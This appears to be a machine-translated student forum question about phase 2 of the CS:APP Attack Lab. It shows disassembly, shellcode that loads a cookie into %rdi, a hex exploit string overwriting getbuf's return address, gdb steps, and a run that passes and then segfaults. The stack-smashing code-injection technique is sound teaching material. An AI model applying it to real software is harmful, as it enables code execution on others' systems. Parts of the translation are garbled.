这是我的攻击实验室 getbuf 和 touch1 , touch 2 信息:
00000000004018c2 <getbuf>:
4018c2: 48 83 ec 18 sub $0x18,%rsp
4018c6: 48 89 e7 mov %rsp,%rdi
4018c9: e8 7e 02 00 00 callq 401b4c <Gets>
4018ce: b8 01 00 00 00 mov $0x1,%eax
4018d3: 48 83 c4 18 add $0x18,%rsp
4018d7: c3 retq
00000000004018d8 <touch1>:
4018d8: 48 83 ec 08 sub $0x8,%rsp
4018dc: c7 05 16 3c 20 00 01 movl $0x1,0x203c16(%rip) # 6054fc <vlevel>
4018e3: 00 00 00
4018e6: bf 57 32 40 00 mov $0x403257,%edi
4018eb: e8 d0 f3 ff ff callq 400cc0 <puts@plt>
4018f0: bf 01 00 00 00 mov $0x1,%edi
4018f5: e8 a7 04 00 00 callq 401da1 <validate>
4018fa: bf 00 00 00 00 mov $0x0,%edi
4018ff: e8 2c f5 ff ff callq 400e30 <exit@plt>
0000000000401904 <touch2>:
401904: 48 83 ec 08 sub $0x8,%rsp
401908: 89 fa mov %edi,%edx
40190a: c7 05 e8 3b 20 00 02 movl $0x2,0x203be8(%rip) # 6054fc <vlevel>
401911: 00 00 00
401914: 39 3d ea 3b 20 00 cmp %edi,0x203bea(%rip) # 605504 <cookie>
40191a: 74 28 je 401944 <touch2+0x40>
40191c: be a8 32 40 00 mov $0x4032a8,%esi
401921: bf 01 00 00 00 mov $0x1,%edi
401926: b8 00 00 00 00 mov $0x0,%eax
40192b: e8 b0 f4 ff ff callq 400de0 <__printf_chk@plt>
401930: bf 02 00 00 00 mov $0x2,%edi
401935: e8 2c 05 00 00 callq 401e66 <fail>
40193a: bf 00 00 00 00 mov $0x0,%edi
40193f: e8 ec f4 ff ff callq 400e30 <exit@plt>
401944: be 80 32 40 00 mov $0x403280,%esi
401949: bf 01 00 00 00 mov $0x1,%edi
40194e: b8 00 00 00 00 mov $0x0,%eax
401953: e8 88 f4 ff ff callq 400de0 <__printf_chk@plt>
401958: bf 02 00 00 00 mov $0x2,%edi
40195d: e8 3f 04 00 00 callq 401da1 <validate>
401962: eb d6 jmp 40193a <touch2+0x36>
我已经完成了第 2 阶段的所有这些步骤:
Vim cookie.txt 我们在里面有地址 0x4b7a4937
在Vim phase2.s下面写下并保存。 mov $0x4b7a4937, %rdi 退
gcc -c phase2.s
objdump -d phase2.o 你会得到如下信息:
phase2.o:文件格式 elf64-x86-64
.text部分的反汇编:
0000000000000000 <.text>: 0: 48 c7 c7 37 49 7a 4b mov $0x4b7a4937,%rdi 7: c3 retq
在 vim phase2.asm 中保存上面
将答案保存在 phase2.txt 中 48 c7 c7 37 49 7a 4b c3 // 第 4 部分答案 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 28 61 55 00 00 00 00 // 第 8 部分答案 04 19 40 00 00 00 00 00 // 触摸 2 地址
gdb ctarget > b getbuf > r > 信息 r 回复 0x556128b0
0x556128b0 - 0x18 = 0x55612898
猫phase2.txt | ./hex2raw | ./ctarget
运行后我会得到以下错误:
Cookie: 0x4b7a4937
Type string:Touch2!: You called touch2(0x4b7a4937)
Valid solution for level 2 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAILED
我找不到我的答案有什么问题。我关注了 youtube 和 github,我会得到相同的答案。